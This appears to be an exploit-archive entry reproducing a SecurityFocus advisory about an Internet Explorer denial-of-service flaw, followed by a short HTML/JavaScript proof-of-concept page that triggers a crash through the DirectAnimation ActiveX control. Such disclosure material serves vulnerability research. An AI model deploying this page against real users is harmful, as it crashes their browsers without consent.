23 lines
No EOL
832 B
HTML
23 lines
No EOL
832 B
HTML
source: http://www.securityfocus.com/bid/18855/info
|
|
|
|
Microsoft Internet Explorer is prone to a denial-of-service vulnerability because it fails to handle ActiveX controls properly.
|
|
|
|
This issue is triggered when an attacker convinces a victim user to activate a malicious ActiveX control.
|
|
|
|
Remote attackers may exploit this issue to crash Internet Explorer, effectively denying service to legitimate users.
|
|
|
|
<html><body><script>
|
|
|
|
// MoBB Demonstration
|
|
function Demo() {
|
|
var a = new ActiveXObject('DirectAnimation.StructuredGraphicsControl');
|
|
a.sourceURL = 'CrashingBecauseStreamPtrNotInitialized';
|
|
}
|
|
|
|
</script>
|
|
|
|
Clicking the button below may crash your browser!<br><br>
|
|
<input type='button' onClick='Demo()' value='Start Demo!'>
|
|
|
|
|
|
</body></html> |